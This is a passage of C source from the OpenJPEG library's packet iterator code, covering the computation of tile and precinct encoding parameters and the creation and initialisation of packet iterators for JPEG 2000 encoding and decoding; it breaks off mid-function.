l_ph = (l_ry0==l_ry1)?0:(OPJ_UINT32)((py1 - l_py0) >> l_pdy);
l_product = l_pw * l_ph;
/* update precision */
if (l_product > *p_max_prec) {
*p_max_prec = l_product;
}
}
++l_img_comp;
++l_tccp;
}
}
void opj_get_all_encoding_parameters( const opj_image_t *p_image,
const opj_cp_t *p_cp,
OPJ_UINT32 tileno,
OPJ_INT32 * p_tx0,
OPJ_INT32 * p_tx1,
OPJ_INT32 * p_ty0,
OPJ_INT32 * p_ty1,
OPJ_UINT32 * p_dx_min,
OPJ_UINT32 * p_dy_min,
OPJ_UINT32 * p_max_prec,
OPJ_UINT32 * p_max_res,
OPJ_UINT32 ** p_resolutions )
{
/* loop*/
OPJ_UINT32 compno, resno;
/* pointers*/
const opj_tcp_t *tcp = 00;
const opj_tccp_t * l_tccp = 00;
const opj_image_comp_t * l_img_comp = 00;
/* to store l_dx, l_dy, w and h for each resolution and component.*/
OPJ_UINT32 * lResolutionPtr;
/* position in x and y of tile*/
OPJ_UINT32 p, q;
/* preconditions in debug*/
assert(p_cp != 00);
assert(p_image != 00);
assert(tileno < p_cp->tw * p_cp->th);
/* initializations*/
tcp = &p_cp->tcps [tileno];
l_tccp = tcp->tccps;
l_img_comp = p_image->comps;
/* position in x and y of tile*/
p = tileno % p_cp->tw;
q = tileno / p_cp->tw;
/* here calculation of tx0, tx1, ty0, ty1, maxprec, l_dx and l_dy */
*p_tx0 = (OPJ_INT32)opj_uint_max(p_cp->tx0 + p * p_cp->tdx, p_image->x0);
*p_tx1 = (OPJ_INT32)opj_uint_min(p_cp->tx0 + (p + 1) * p_cp->tdx, p_image->x1);
*p_ty0 = (OPJ_INT32)opj_uint_max(p_cp->ty0 + q * p_cp->tdy, p_image->y0);
*p_ty1 = (OPJ_INT32)opj_uint_min(p_cp->ty0 + (q + 1) * p_cp->tdy, p_image->y1);
/* max precision and resolution is 0 (can only grow)*/
*p_max_prec = 0;
*p_max_res = 0;
/* initialize dx_min and dy_min to the largest possible value so the real minimum can be taken below */
*p_dx_min = 0x7fffffff;
*p_dy_min = 0x7fffffff;
for (compno = 0; compno < p_image->numcomps; ++compno) {
/* arithmetic variables to calculate*/
OPJ_UINT32 l_level_no;
OPJ_INT32 l_rx0, l_ry0, l_rx1, l_ry1;
OPJ_INT32 l_px0, l_py0, l_px1, py1;
OPJ_UINT32 l_product;
OPJ_INT32 l_tcx0, l_tcy0, l_tcx1, l_tcy1;
OPJ_UINT32 l_pdx, l_pdy , l_pw , l_ph;
lResolutionPtr = p_resolutions[compno];
l_tcx0 = opj_int_ceildiv(*p_tx0, (OPJ_INT32)l_img_comp->dx);
l_tcy0 = opj_int_ceildiv(*p_ty0, (OPJ_INT32)l_img_comp->dy);
l_tcx1 = opj_int_ceildiv(*p_tx1, (OPJ_INT32)l_img_comp->dx);
l_tcy1 = opj_int_ceildiv(*p_ty1, (OPJ_INT32)l_img_comp->dy);
if (l_tccp->numresolutions > *p_max_res) {
*p_max_res = l_tccp->numresolutions;
}
/* use custom size for precincts*/
l_level_no = l_tccp->numresolutions - 1;
for (resno = 0; resno < l_tccp->numresolutions; ++resno) {
OPJ_UINT32 l_dx, l_dy;
/* precinct width and height*/
l_pdx = l_tccp->prcw[resno];
l_pdy = l_tccp->prch[resno];
*lResolutionPtr++ = l_pdx;
*lResolutionPtr++ = l_pdy;
l_dx = l_img_comp->dx * (1u << (l_pdx + l_level_no));
l_dy = l_img_comp->dy * (1u << (l_pdy + l_level_no));
/* take the minimum size for l_dx for each comp and resolution*/
*p_dx_min = (OPJ_UINT32)opj_int_min((OPJ_INT32)*p_dx_min, (OPJ_INT32)l_dx);
*p_dy_min = (OPJ_UINT32)opj_int_min((OPJ_INT32)*p_dy_min, (OPJ_INT32)l_dy);
/* various calculations of extents*/
l_rx0 = opj_int_ceildivpow2(l_tcx0, (OPJ_INT32)l_level_no);
l_ry0 = opj_int_ceildivpow2(l_tcy0, (OPJ_INT32)l_level_no);
l_rx1 = opj_int_ceildivpow2(l_tcx1, (OPJ_INT32)l_level_no);
l_ry1 = opj_int_ceildivpow2(l_tcy1, (OPJ_INT32)l_level_no);
l_px0 = opj_int_floordivpow2(l_rx0, (OPJ_INT32)l_pdx) << l_pdx;
l_py0 = opj_int_floordivpow2(l_ry0, (OPJ_INT32)l_pdy) << l_pdy;
l_px1 = opj_int_ceildivpow2(l_rx1, (OPJ_INT32)l_pdx) << l_pdx;
py1 = opj_int_ceildivpow2(l_ry1, (OPJ_INT32)l_pdy) << l_pdy;
l_pw = (l_rx0==l_rx1)?0:(OPJ_UINT32)((l_px1 - l_px0) >> l_pdx);
l_ph = (l_ry0==l_ry1)?0:(OPJ_UINT32)((py1 - l_py0) >> l_pdy);
*lResolutionPtr++ = l_pw;
*lResolutionPtr++ = l_ph;
l_product = l_pw * l_ph;
/* update precision*/
if (l_product > *p_max_prec) {
*p_max_prec = l_product;
}
--l_level_no;
}
++l_tccp;
++l_img_comp;
}
}
opj_pi_iterator_t * opj_pi_create( const opj_image_t *image,
const opj_cp_t *cp,
OPJ_UINT32 tileno )
{
/* loop*/
OPJ_UINT32 pino, compno;
/* number of poc in the p_pi*/
OPJ_UINT32 l_poc_bound;
/* pointers to tile coding parameters and components.*/
opj_pi_iterator_t *l_pi = 00;
opj_tcp_t *tcp = 00;
const opj_tccp_t *tccp = 00;
/* current packet iterator being allocated*/
opj_pi_iterator_t *l_current_pi = 00;
/* preconditions in debug*/
assert(cp != 00);
assert(image != 00);
assert(tileno < cp->tw * cp->th);
/* initializations*/
tcp = &cp->tcps[tileno];
l_poc_bound = tcp->numpocs+1;
/* memory allocations*/
l_pi = (opj_pi_iterator_t*) opj_calloc((l_poc_bound), sizeof(opj_pi_iterator_t));
if (!l_pi) {
return NULL;
}
l_current_pi = l_pi;
for (pino = 0; pino < l_poc_bound ; ++pino) {
l_current_pi->comps = (opj_pi_comp_t*) opj_calloc(image->numcomps, sizeof(opj_pi_comp_t));
if (! l_current_pi->comps) {
opj_pi_destroy(l_pi, l_poc_bound);
return NULL;
}
l_current_pi->numcomps = image->numcomps;
for (compno = 0; compno < image->numcomps; ++compno) {
opj_pi_comp_t *comp = &l_current_pi->comps[compno];
tccp = &tcp->tccps[compno];
comp->resolutions = (opj_pi_resolution_t*) opj_calloc(tccp->numresolutions, sizeof(opj_pi_resolution_t));
if (!comp->resolutions) {
opj_pi_destroy(l_pi, l_poc_bound);
return 00;
}
comp->numresolutions = tccp->numresolutions;
}
++l_current_pi;
}
return l_pi;
}
void opj_pi_update_encode_poc_and_final ( opj_cp_t *p_cp,
OPJ_UINT32 p_tileno,
OPJ_INT32 p_tx0,
OPJ_INT32 p_tx1,
OPJ_INT32 p_ty0,
OPJ_INT32 p_ty1,
OPJ_UINT32 p_max_prec,
OPJ_UINT32 p_max_res,
OPJ_UINT32 p_dx_min,
OPJ_UINT32 p_dy_min)
{
/* loop*/
OPJ_UINT32 pino;
/* tile coding parameter*/
opj_tcp_t *l_tcp = 00;
/* current poc being updated*/
opj_poc_t * l_current_poc = 00;
/* number of pocs*/
OPJ_UINT32 l_poc_bound;
OPJ_ARG_NOT_USED(p_max_res);
/* preconditions in debug*/
assert(p_cp != 00);
assert(p_tileno < p_cp->tw * p_cp->th);
/* initializations*/
l_tcp = &p_cp->tcps [p_tileno];
/* number of iterations in the loop */
l_poc_bound = l_tcp->numpocs+1;
/* start at the first element and, to make sure the compiler does not recompute the address
on each loop iteration, store a pointer to the current element to modify rather than indexing l_tcp->pocs[i]*/
l_current_poc = l_tcp->pocs;
l_current_poc->compS = l_current_poc->compno0;
l_current_poc->compE = l_current_poc->compno1;
l_current_poc->resS = l_current_poc->resno0;
l_current_poc->resE = l_current_poc->resno1;
l_current_poc->layE = l_current_poc->layno1;
/* special treatment for the first element*/
l_current_poc->layS = 0;
l_current_poc->prg = l_current_poc->prg1;
l_current_poc->prcS = 0;
l_current_poc->prcE = p_max_prec;
l_current_poc->txS = (OPJ_UINT32)p_tx0;
l_current_poc->txE = (OPJ_UINT32)p_tx1;
l_current_poc->tyS = (OPJ_UINT32)p_ty0;
l_current_poc->tyE = (OPJ_UINT32)p_ty1;
l_current_poc->dx = p_dx_min;
l_current_poc->dy = p_dy_min;
++ l_current_poc;
for (pino = 1;pino < l_poc_bound ; ++pino) {
l_current_poc->compS = l_current_poc->compno0;
l_current_poc->compE= l_current_poc->compno1;
l_current_poc->resS = l_current_poc->resno0;
l_current_poc->resE = l_current_poc->resno1;
l_current_poc->layE = l_current_poc->layno1;
l_current_poc->prg = l_current_poc->prg1;
l_current_poc->prcS = 0;
/* special treatment here different from the first element*/
l_current_poc->layS = (l_current_poc->layE > (l_current_poc-1)->layE) ? l_current_poc->layE : 0;
l_current_poc->prcE = p_max_prec;
l_current_poc->txS = (OPJ_UINT32)p_tx0;
l_current_poc->txE = (OPJ_UINT32)p_tx1;
l_current_poc->tyS = (OPJ_UINT32)p_ty0;
l_current_poc->tyE = (OPJ_UINT32)p_ty1;
l_current_poc->dx = p_dx_min;
l_current_poc->dy = p_dy_min;
++ l_current_poc;
}
}
void opj_pi_update_encode_not_poc ( opj_cp_t *p_cp,
OPJ_UINT32 p_num_comps,
OPJ_UINT32 p_tileno,
OPJ_INT32 p_tx0,
OPJ_INT32 p_tx1,
OPJ_INT32 p_ty0,
OPJ_INT32 p_ty1,
OPJ_UINT32 p_max_prec,
OPJ_UINT32 p_max_res,
OPJ_UINT32 p_dx_min,
OPJ_UINT32 p_dy_min)
{
/* loop*/
OPJ_UINT32 pino;
/* tile coding parameter*/
opj_tcp_t *l_tcp = 00;
/* current poc being updated*/
opj_poc_t * l_current_poc = 00;
/* number of pocs*/
OPJ_UINT32 l_poc_bound;
/* preconditions in debug*/
assert(p_cp != 00);
assert(p_tileno < p_cp->tw * p_cp->th);
/* initializations*/
l_tcp = &p_cp->tcps [p_tileno];
/* number of iterations in the loop */
l_poc_bound = l_tcp->numpocs+1;
/* start at the first element and, to make sure the compiler does not recompute the address
on each loop iteration, store a pointer to the current element to modify rather than indexing l_tcp->pocs[i]*/
l_current_poc = l_tcp->pocs;
for (pino = 0; pino < l_poc_bound ; ++pino) {
l_current_poc->compS = 0;
l_current_poc->compE = p_num_comps;/*p_image->numcomps;*/
l_current_poc->resS = 0;
l_current_poc->resE = p_max_res;
l_current_poc->layS = 0;
l_current_poc->layE = l_tcp->numlayers;
l_current_poc->prg = l_tcp->prg;
l_current_poc->prcS = 0;
l_current_poc->prcE = p_max_prec;
l_current_poc->txS = (OPJ_UINT32)p_tx0;
l_current_poc->txE = (OPJ_UINT32)p_tx1;
l_current_poc->tyS = (OPJ_UINT32)p_ty0;
l_current_poc->tyE = (OPJ_UINT32)p_ty1;
l_current_poc->dx = p_dx_min;
l_current_poc->dy = p_dy_min;
++ l_current_poc;
}
}
void opj_pi_update_decode_poc (opj_pi_iterator_t * p_pi,
opj_tcp_t * p_tcp,
OPJ_UINT32 p_max_precision,
OPJ_UINT32 p_max_res)
{
/* loop*/
OPJ_UINT32 pino;
/* encoding parameters to set*/
OPJ_UINT32 l_bound;
opj_pi_iterator_t * l_current_pi = 00;
opj_poc_t* l_current_poc = 0;
OPJ_ARG_NOT_USED(p_max_res);
/* preconditions in debug*/
assert(p_pi != 00);
assert(p_tcp != 00);
/* initializations*/
l_bound = p_tcp->numpocs+1;
l_current_pi = p_pi;
l_current_poc = p_tcp->pocs;
for (pino = 0;pino<l_bound;++pino) {
l_current_pi->poc.prg = l_current_poc->prg; /* Progression Order #0 */
l_current_pi->first = 1;
l_current_pi->poc.resno0 = l_current_poc->resno0; /* Resolution Level Index #0 (Start) */
l_current_pi->poc.compno0 = l_current_poc->compno0; /* Component Index #0 (Start) */
l_current_pi->poc.layno0 = 0;
l_current_pi->poc.precno0 = 0;
l_current_pi->poc.resno1 = l_current_poc->resno1; /* Resolution Level Index #0 (End) */
l_current_pi->poc.compno1 = l_current_poc->compno1; /* Component Index #0 (End) */
l_current_pi->poc.layno1 = l_current_poc->layno1; /* Layer Index #0 (End) */
l_current_pi->poc.precno1 = p_max_precision;
++l_current_pi;
++l_current_poc;
}
}
void opj_pi_update_decode_not_poc (opj_pi_iterator_t * p_pi,
opj_tcp_t * p_tcp,
OPJ_UINT32 p_max_precision,
OPJ_UINT32 p_max_res)
{
/* loop*/
OPJ_UINT32 pino;
/* encoding parameters to set*/
OPJ_UINT32 l_bound;
opj_pi_iterator_t * l_current_pi = 00;
/* preconditions in debug*/
assert(p_tcp != 00);
assert(p_pi != 00);
/* initializations*/
l_bound = p_tcp->numpocs+1;
l_current_pi = p_pi;
for (pino = 0;pino<l_bound;++pino) {
l_current_pi->poc.prg = p_tcp->prg;
l_current_pi->first = 1;
l_current_pi->poc.resno0 = 0;
l_current_pi->poc.compno0 = 0;
l_current_pi->poc.layno0 = 0;
l_current_pi->poc.precno0 = 0;
l_current_pi->poc.resno1 = p_max_res;
l_current_pi->poc.compno1 = l_current_pi->numcomps;
l_current_pi->poc.layno1 = p_tcp->numlayers;
l_current_pi->poc.precno1 = p_max_precision;
++l_current_pi;
}
}
OPJ_BOOL opj_pi_check_next_level( OPJ_INT32 pos,
opj_cp_t *cp,
OPJ_UINT32 tileno,
OPJ_UINT32 pino,
const OPJ_CHAR *prog)
{
OPJ_INT32 i;
opj_tcp_t *tcps =&cp->tcps[tileno];
opj_poc_t *tcp = &tcps->pocs[pino];
if(pos>=0){
for(i=pos;i>=0;i--){
switch(prog[i]){
case 'R':
if(tcp->res_t==tcp->resE){
if(opj_pi_check_next_level(pos-1,cp,tileno,pino,prog)){
return OPJ_TRUE;
}else{
return OPJ_FALSE;
}
}else{
return OPJ_TRUE;
}
break;
case 'C':
if(tcp->comp_t==tcp->compE){
if(opj_pi_check_next_level(pos-1,cp,tileno,pino,prog)){
return OPJ_TRUE;
}else{
return OPJ_FALSE;
}
}else{
return OPJ_TRUE;
}
break;
case 'L':
if(tcp->lay_t==tcp->layE){
if(opj_pi_check_next_level(pos-1,cp,tileno,pino,prog)){
return OPJ_TRUE;
}else{
return OPJ_FALSE;
}
}else{
return OPJ_TRUE;
}
break;
case 'P':
switch(tcp->prg){
case OPJ_LRCP: /* fall through */
case OPJ_RLCP:
if(tcp->prc_t == tcp->prcE){
if(opj_pi_check_next_level(i-1,cp,tileno,pino,prog)){
return OPJ_TRUE;
}else{
return OPJ_FALSE;
}
}else{
return OPJ_TRUE;
}
break;
default:
if(tcp->tx0_t == tcp->txE){
/*TY*/
if(tcp->ty0_t == tcp->tyE){
if(opj_pi_check_next_level(i-1,cp,tileno,pino,prog)){
return OPJ_TRUE;
}else{
return OPJ_FALSE;
}
}else{
return OPJ_TRUE;
}/*TY*/
}else{
return OPJ_TRUE;
}
break;
}/*end case P*/
}/*end switch*/
}/*end for*/
}/*end if*/
return OPJ_FALSE;
}
/*
==========================================================
Packet iterator interface
==========================================================
*/
opj_pi_iterator_t *opj_pi_create_decode(opj_image_t *p_image,
opj_cp_t *p_cp,
OPJ_UINT32 p_tile_no)
{
/* loop */
OPJ_UINT32 pino;
OPJ_UINT32 compno, resno;
/* to store w, h, dx and dy for all components and resolutions */
OPJ_UINT32 * l_tmp_data;
OPJ_UINT32 ** l_tmp_ptr;
/* encoding parameters to set */
OPJ_UINT32 l_max_res;
OPJ_UINT32 l_max_prec;
OPJ_INT32 l_tx0,l_tx1,l_ty0,l_ty1;
OPJ_UINT32 l_dx_min,l_dy_min;
OPJ_UINT32 l_bound;
OPJ_UINT32 l_step_p , l_step_c , l_step_r , l_step_l ;
OPJ_UINT32 l_data_stride;
/* pointers */
opj_pi_iterator_t *l_pi = 00;
opj_tcp_t *l_tcp = 00;
const opj_tccp_t *l_tccp = 00;
opj_pi_comp_t *l_current_comp = 00;
opj_image_comp_t * l_img_comp = 00;
opj_pi_iterator_t * l_current_pi = 00;
OPJ_UINT32 * l_encoding_value_ptr = 00;
/* preconditions in debug */
assert(p_cp != 00);
assert(p_image != 00);
assert(p_tile_no < p_cp->tw * p_cp->th);
/* initializations */
l_tcp = &p_cp->tcps[p_tile_no];
l_bound = l_tcp->numpocs+1;
l_data_stride = 4 * OPJ_J2K_MAXRLVLS;
l_tmp_data = (OPJ_UINT32*)opj_malloc(
l_data_stride * p_image->numcomps * sizeof(OPJ_UINT32));
if
(! l_tmp_data)
{
return 00;
}
l_tmp_ptr = (OPJ_UINT32**)opj_malloc(
p_image->numcomps * sizeof(OPJ_UINT32 *));
if
(! l_tmp_ptr)
{
opj_free(l_tmp_data);
return 00;
}
/* memory allocation for pi */
l_pi = opj_pi_create(p_image, p_cp, p_tile_no);
if (!l_pi) {
opj_free(l_tmp_data);
opj_free(l_tmp_ptr);
return 00;
}
l_encoding_value_ptr = l_tmp_data;
/* update pointer array */
for
(compno = 0; compno < p_image->numcomps; ++compno)
{
l_tmp_ptr[compno] = l_encoding_value_ptr;
l_encoding_value_ptr += l_data_stride;
}
/* get encoding parameters */
opj_get_all_encoding_parameters(p_image,p_cp,p_tile_no,&l_tx0,&l_tx1,&l_ty0,&l_ty1,&l_dx_min,&l_dy_min,&l_max_prec,&l_max_res,l_tmp_ptr);
/* step calculations */
l_step_p = 1;
l_step_c = l_max_prec * l_step_p;
l_step_r = p_image->numcomps * l_step_c;
l_step_l = l_max_res * l_step_r;
/* set values for first packet iterator */
l_current_pi = l_pi;
/* memory allocation for include */
l_current_pi->include = (OPJ_INT16*) opj_calloc((l_tcp->numlayers +1) * l_step_l, sizeof(OPJ_INT16));
if
(!l_current_pi->include)
{
opj_free(l_tmp_data);
opj_free(l_tmp_ptr);
opj_pi_destroy(l_pi, l_bound);
return 00;
}
/* special treatment for the first packet iterator */
l_current_comp = l_current_pi->comps;
l_img_comp = p_image->comps;
l_tccp = l_tcp->tccps;
l_current_pi->tx0 = l_tx0;
l_current_pi->ty0 = l_ty0;
l_current_pi->tx1 = l_tx1;
l_current_pi->ty1 = l_ty1;
/*l_current_pi->dx = l_img_comp->dx;*/
/*l_current_pi->dy = l_img_comp->dy;*/
l_current_pi->step_p = l_step_p;
l_current_pi->step_c = l_step_c;
l_current_pi->step_r = l_step_r;
l_current_pi->step_l = l_step_l;
/* allocation for components and number of components has already been calculated by opj_pi_create */
for
(compno = 0; compno < l_current_pi->numcomps; ++compno)
{
opj_pi_resolution_t *l_res = l_current_comp->resolutions;
l_encoding_value_ptr = l_tmp_ptr[compno];
l_current_comp->dx = l_img_comp->dx;
l_current_comp->dy = l_img_comp->dy;
/* resolutions have already been initialized */
for
(resno = 0; resno < l_current_comp->numresolutions; resno++)
{
l_res->pdx = *(l_encoding_value_ptr++);
l_res->pdy = *(l_encoding_value_ptr++);
l_res->pw = *(l_encoding_value_ptr++);
l_res->ph = *(l_encoding_value_ptr++);
++l_res;
}
++l_current_comp;
++l_img_comp;
++l_tccp;
}
++l_current_pi;
for (pino = 1 ; pino<l_bound ; ++pino )
{
l_current_comp = l_current_pi->comps;
l_img_comp = p_image->comps;
l_tccp = l_tcp->tccps;
l_current_pi->tx0 = l_tx0;
l_current_pi->ty0 = l_ty0;
l_current_pi->tx1 = l_tx1;
l_current_pi->ty1 = l_ty1;
/*l_current_pi->dx = l_dx_min;*/
/*l_current_pi->dy = l_dy_min;*/
l_current_pi->step_p = l_step_p;
l_current_pi->step_c = l_step_c;
l_current_pi->step_r = l_step_r;
l_current_pi->step_l = l_step_l;
/* allocation for components and number of components has already been calculated by opj_pi_create */
for
(compno = 0; compno < l_current_pi->numcomps; ++compno)
{
opj_pi_resolution_t *l_res = l_current_comp->resolutions;
l_encoding_value_ptr = l_tmp_ptr[compno];
l_current_comp->dx = l_img_comp->dx;
l_current_comp->dy = l_img_comp->dy;
/* resolutions have already been initialized */
for (resno = 0; resno < l_current_comp->numresolutions; resno++) {
l_res->pdx = *(l_encoding_value_ptr++);
l_res->pdy = *(l_encoding_value_ptr++);
l_res->pw = *(l_encoding_value_ptr++);
l_res->ph = *(l_encoding_value_ptr++);
++l_res;
}
++l_current_comp;
++l_img_comp;
++l_tccp;
}
/* special treatment*/
l_current_pi->include = (l_current_pi-1)->include;
++l_current_pi;
}
opj_free(l_tmp_data);
l_tmp_data = 00;
opj_free(l_tmp_ptr);
l_tmp_ptr = 00;
if (l_tcp->POC) {
    opj_pi_update_decode_poc(l_pi,l_tcp,l_max_prec,l_max_res);
}
else {
    opj_pi_update_decode_not_poc(l_pi,l_tcp,l_max_prec,l_max_res);
}
return l_pi;
}
opj_pi_iterator_t *opj_pi_initialise_encode(const opj_image_t *p_image,
opj_cp_t *p_cp,
OPJ_UINT32 p_tile_no,
J2K_T2_MODE p_t2_mode )
{
/* loop*/
OPJ_UINT32 pino;
OPJ_UINT32 compno, resno;
/* to store w, h, dx and dy for all components and resolutions*/
OPJ_UINT32 * l_tmp_data;
OPJ_UINT32 ** l_tmp_ptr;
/* encoding parameters to set*/
OPJ_UINT32 l_max_res;
OPJ_UINT32 l_max_prec;
OPJ_INT32 l_tx0,l_tx1,l_ty0,l_ty1;
OPJ_UINT32 l_dx_min,l_dy_min;
OPJ_UINT32 l_bound;
OPJ_UINT32 l_step_p , l_step_c , l_step_r , l_step_l ;
OPJ_UINT32 l_data_stride;
/* pointers*/
opj_pi_iterator_t *l_pi = 00;
opj_tcp_t *l_tcp = 00;
const opj_tccp_t *l_tccp = 00;
opj_pi_comp_t *l_current_comp = 00;
opj_image_comp_t * l_img_comp = 00;
opj_pi_iterator_t * l_current_pi = 00;
OPJ_UINT32 * l_encoding_value_ptr = 00;
/* preconditions in debug*/
assert(p_cp != 00);
assert(p_image != 00);
assert(p_tile_no < p_cp->tw * p_cp->th);
/* initializations*/
l_tcp = &p_cp->tcps[p_tile_no];
l_bound = l_tcp->numpocs+1;
l_data_stride = 4 * OPJ_J2K_MAXRLVLS;
l_tmp_data = (OPJ_UINT32*)opj_malloc(
l_data_stride * p_image->numcomps * sizeof(OPJ_UINT32));
if (! l_tmp_data) {
return 00;
}
l_tmp_ptr = (OPJ_UINT32**)opj_malloc(
p_image->numcomps * sizeof(OPJ_UINT32 *));
if (! l_tmp_ptr) {
opj_free(l_tmp_data);
return 00;
}
/* memory allocation for pi*/
l_pi = opj_pi_create(p_image,p_cp,p_tile_no);
if (!l_pi) {
opj_free(l_tmp_data);
opj_free(l_tmp_ptr);
return 00;
}
l_encoding_value_ptr = l_tmp_data;
/* update pointer array*/
for (compno = 0; compno < p_image->numcomps; ++compno) {
l_tmp_ptr[compno] = l_encoding_value_ptr;
l_encoding_value_ptr += l_data_stride;
}
/* get encoding parameters*/
opj_get_all_encoding_parameters(p_image,p_cp,p_tile_no,&l_tx0,&l_tx1,&l_ty0,&l_ty1,&l_dx_min,&l_dy_min,&l_max_prec,&l_max_res,l_tmp_ptr);
/* step calculations*/
l_step_p = 1;
l_step_c = l_max_prec * l_step_p;
l_step_r = p_image->numcomps * l_step_c;
l_step_l = l_max_res * l_step_r;
/* set values for first packet iterator*/
l_pi->tp_on = p_cp->m_specific_param.m_enc.m_tp_on;
l_current_pi = l_pi;
/* memory allocation for include*/
l_current_pi->include = (OPJ_INT16*) opj_calloc(l_tcp->numlayers * l_step_l, sizeof(OPJ_INT16));
if (!l_current_pi->include) {
opj_free(l_tmp_data);
opj_free(l_tmp_ptr);
opj_pi_destroy(l_pi, l_bound);
return 00;
}
/* special treatment for the first packet iterator*/
l_current_comp = l_current_pi->comps;
l_img_comp = p_image->comps;
l_tccp = l_tcp->tccps;
l_current_pi->tx0 = l_tx0;
l_current_pi->ty0 = l_ty0;
l_current_pi->tx1 = l_tx1;
l_current_pi->ty1 = l_ty1;
l_current_pi->dx = l_dx_min;
l_current_pi->dy = l_dy_min;
l_current_pi->step_p = l_step_p;
l_current_pi->step_c = l_step_c;
l_current_pi->step_r = l_step_r;
l_current_pi->step_l = l_step_l;
/* allocation for components and number of components has already been calculated by opj_pi_create */
for (compno = 0; compno < l_current_pi->numcomps; ++compno) {
opj_pi_resolution_t *l_res = l_current_comp->resolutions;
l_encoding_value_ptr = l_tmp_ptr[compno];
l_current_comp->dx = l_img_comp->dx;
l_current_comp->dy = l_img_comp->dy;
/* resolutions have already been initialized */
for (resno = 0; resno < l_current_comp->numresolutions; resno++) {
l_res->pdx = *(l_encoding_value_ptr++);
l_res->pdy = *(l_encoding_value_ptr++);
l_res->pw = *(l_encoding_value_ptr++);
l_res->ph = *(l_encoding_value_ptr++);
++l_res;
}
++l_current_comp;
++l_img_comp;
++l_tccp;
}
++l_current_pi;
for (pino = 1 ; pino<l_bound ; ++pino ) {
l_current_comp = l_current_pi->comps;
l_img_comp = p_image->comps;
l_tccp = l_tcp->tccps;
l_current_pi->tx0 = l_tx0;
l_current_pi->ty0 = l_ty0;
l_current_pi->tx1 = l_tx1;
l_current_pi->ty1 = l_ty1;
l_current_pi->dx = l_dx_min;
l_current_pi->dy = l_dy_min;
l_current_pi->step_p = l_step_p;
l_current_pi->step_c = l_step_c;
l_current_pi->step_r = l_step_r;
l_current_pi->step_l = l_step_l;
/* allocation for components and number of components has already been calculated by opj_pi_create */
for (compno = 0; compno < l_current_pi->numcomps; ++compno) {
opj_pi_resolution_t *l_res = l_current_comp->resolutions;
l_encoding_value_ptr = l_tmp_ptr[compno];
l_current_comp->dx = l_img_comp->dx;
l_current_comp->dy = l_img_comp->dy;
/* resolutions have already been initialized */
for (resno = 0; resno < l_current_comp->numresolutions; resno++) {
l_res->pdx = *(l_encoding_value_ptr++);
l_res->pdy = *(l_encoding_value_ptr++);
l_res->pw = *(l_encoding_value_ptr++);
l_res->ph = *(l_encoding_value_ptr++);
++l_res;
}
++l_current_comp;
++l_img_comp;
++l_tccp;
}
/* special treatment*/
l_current_pi->include = (l_current_pi-1)->include;
++l_current_pi;
}
opj_free(l_tmp_data);
l_tmp_data = 00;
opj_free(l_tmp_ptr);
l_tmp_ptr = 00;
if (l_tcp->POC && (OPJ_IS_CINEMA(p_cp->rsiz) || p_t2_mode == FINAL_PASS)) {
opj_pi_update_encode_poc_and_final(p_cp,p_tile_no,l_tx0,l_tx1,l_ty0,l_ty1,l_max_prec,l_max_res,l_dx_min,l_dy_min);
}
else {
opj_pi_update_encode_not_poc(p_cp,p_image->numcomps,p_tile_no,l_tx0,l_tx1,l_ty0,l_ty1,l_max_prec,l_max_res,l_dx_min,l_dy_min);
}
return l_pi;
}
void opj_pi_create_encode( opj_pi_iterator_t *pi,
opj_cp_t *cp,
OPJ_UINT32 tileno,
OPJ_UINT32 pino,
OPJ_UINT32 tpnum,
OPJ_INT32 tppos,
J2K_T2_MODE t2_mode)
{
const OPJ_CHAR *prog;
OPJ_INT32 i;
OPJ_UINT32 incr_top=1,resetX=0;
opj_tcp_t *tcps =&cp->tcps[tileno];
opj_poc_t *tcp= &tcps->pocs[pino];
prog = opj_j2k_convert_progression_order(tcp->prg);
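/* prog is the 4-letter progression string for this POC (e.g. "LRCP"); each
 * letter selects which dimension ('L'ayer, 'R'esolution, 'C'omponent or
 * 'P'recinct/position) the corresponding loop level below iterates over. */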
pi[pino].first = 1;
pi[pino].poc.prg = tcp->prg;
if(!(cp->m_specific_param.m_enc.m_tp_on && ((!OPJ_IS_CINEMA(cp->rsiz) && (t2_mode == FINAL_PASS)) || OPJ_IS_CINEMA(cp->rsiz)))){
pi[pino].poc.resno0 = tcp->resS;
pi[pino].poc.resno1 = tcp->resE;
pi[pino].poc.compno0 = tcp->compS;
pi[pino].poc.compno1 = tcp->compE;
pi[pino].poc.layno0 = tcp->layS;
pi[pino].poc.layno1 = tcp->layE;
pi[pino].poc.precno0 = tcp->prcS;
pi[pino].poc.precno1 = tcp->prcE;
pi[pino].poc.tx0 = (OPJ_INT32)tcp->txS;
pi[pino].poc.ty0 = (OPJ_INT32)tcp->tyS;
pi[pino].poc.tx1 = (OPJ_INT32)tcp->txE;
pi[pino].poc.ty1 = (OPJ_INT32)tcp->tyE;
}else {
for(i=tppos+1;i<4;i++){
switch(prog[i]){
case 'R':
pi[pino].poc.resno0 = tcp->resS;
pi[pino].poc.resno1 = tcp->resE;
break;
case 'C':
pi[pino].poc.compno0 = tcp->compS;
pi[pino].poc.compno1 = tcp->compE;
break;
case 'L':
pi[pino].poc.layno0 = tcp->layS;
pi[pino].poc.layno1 = tcp->layE;
break;
case 'P':
switch(tcp->prg){
case OPJ_LRCP:
case OPJ_RLCP:
pi[pino].poc.precno0 = tcp->prcS;
pi[pino].poc.precno1 = tcp->prcE;
break;
default:
pi[pino].poc.tx0 = (OPJ_INT32)tcp->txS;
pi[pino].poc.ty0 = (OPJ_INT32)tcp->tyS;
pi[pino].poc.tx1 = (OPJ_INT32)tcp->txE;
pi[pino].poc.ty1 = (OPJ_INT32)tcp->tyE;
break;
}
break;
}
}
if(tpnum==0){
for(i=tppos;i>=0;i--){
switch(prog[i]){
case 'C':
tcp->comp_t = tcp->compS;
pi[pino].poc.compno0 = tcp->comp_t;
pi[pino].poc.compno1 = tcp->comp_t+1;
tcp->comp_t+=1;
break;
case 'R':
tcp->res_t = tcp->resS;
pi[pino].poc.resno0 = tcp->res_t;
pi[pino].poc.resno1 = tcp->res_t+1;
tcp->res_t+=1;
break;
case 'L':
tcp->lay_t = tcp->layS;
pi[pino].poc.layno0 = tcp->lay_t;
pi[pino].poc.layno1 = tcp->lay_t+1;
tcp->lay_t+=1;
break;
case 'P':
switch(tcp->prg){
case OPJ_LRCP:
case OPJ_RLCP:
tcp->prc_t = tcp->prcS;
pi[pino].poc.precno0 = tcp->prc_t;
pi[pino].poc.precno1 = tcp->prc_t+1;
tcp->prc_t+=1;
break;
default:
tcp->tx0_t = tcp->txS;
tcp->ty0_t = tcp->tyS;
pi[pino].poc.tx0 = (OPJ_INT32)tcp->tx0_t;
